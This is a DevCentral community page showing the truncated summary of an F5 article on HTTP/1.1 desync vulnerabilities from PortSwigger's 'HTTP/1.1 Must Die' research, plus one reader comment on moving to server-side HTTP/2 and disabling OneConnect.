HTTP/1.1’s Limitations - and How F5 Has You Covered

Summary In his latest research, HTTP/1.1 Must Die, James Kettle of PortSwigger demonstrates how small parsing discrepancies between front-end and back-end servers can create “desync” vulnerabilitie...

Updated Aug 21, 2025

Version 2.0

F5 Security Research Team

security

Hen_Golubenko

Employee

Joined July 14, 2025

View Profile

ronnygreenberg

Employee

Joined August 14, 2025

View Profile

Juergen_Mang

MVP

Sep 01, 2025

Great article! I have read this research in my holiday and planed to write something about it on DevCentral, but you were faster.

As I understand the research:

The only real solution is to use only HTTP/2 on server side, everything else is patchwork.
HTTP/1 on client side is not so dangerous.
OneConnect should be disabled.

I am curious to know who uses http/2 only on serverside in production setups? Most F5 deployments I see don't use HTTP/2 at all.

Edit: What is the best way to enforce HTTP/2 server side connections only?

HTTP/1.1’s Limitations - and How F5 Has You Covered

ABOUT DEVCENTRAL

RESOURCES

SUPPORT

PARTNERS